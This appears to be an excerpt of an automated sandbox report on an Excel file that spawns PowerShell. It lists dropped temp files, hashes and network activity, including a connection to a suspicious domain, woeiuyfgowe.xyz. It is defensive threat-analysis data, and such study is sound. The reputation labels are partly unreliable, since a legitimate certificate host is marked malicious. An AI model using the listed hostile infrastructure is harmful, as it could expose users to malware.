6.3.9600.16384 (winblue_rtm.130821-1623)
Total events
1 212
Read events
902
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
7
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
1224EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR4A49.tmp.cvr
MD5:
SHA256:
1224EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF714A4F870C7BB2FB.TMP
MD5:
SHA256:
1224EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF1FC28AEF9A0AFE68.TMP
MD5:
SHA256:
1224EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF7FD0B51E169EAC63.TMP
MD5:
SHA256:
2812powErsHell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2CT3OMLCJ5C6BXX87D4M.temp
MD5:
SHA256:
1224EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF86DFC923D75CF388.TMP
MD5:
SHA256:
1224EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFF792C0F23390CC6B.TMP
MD5:
SHA256:
1224EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF23B69EF8867CEB74.TMP
MD5:
SHA256:
1224EXCEL.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:7C5D4C42DC17FE83E70B9EC3F26BA8E3
SHA256:10F1DF9184440BE6364B78582B15AEB2F76E51DD9C6F7CFDD0F73895D29905C5
1224EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:1ADA8101959D96D88887BBCEB951262E
SHA256:AD15134D8545E685942864895F5D09972780DA25055F38A0AB2640DC81F6C577
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2812
powErsHell.exe
GET
200
192.35.177.64:80
http://apps.identrust.com/roots/dstrootcax3.p7c
US
cat
893 b
shared
2812
powErsHell.exe
GET
200
95.140.132.86:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?87ad051395b0149f
IT
compressed
56.3 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2812
powErsHell.exe
192.35.177.64:80
apps.identrust.com
IdenTrust
US
malicious
2812
powErsHell.exe
185.158.249.75:443
woeiuyfgowe.xyz
easystores GmbH
NL
suspicious
2812
powErsHell.exe
95.140.132.86:80
ctldl.windowsupdate.com
VSIX Nap del Nord Est
IT
unknown

DNS requests

Domain
IP
Reputation
www.microsoft.com
  • 2.21.38.54
whitelisted
woeiuyfgowe.xyz
  • 185.158.249.75
suspicious
apps.identrust.com
  • 192.35.177.64
shared
ctldl.windowsupdate.com
  • 95.140.132.86
whitelisted

Threats

No threats detected
Process
Message
EXCEL.EXE
SHIMVIEW: ShimInfo(Complete)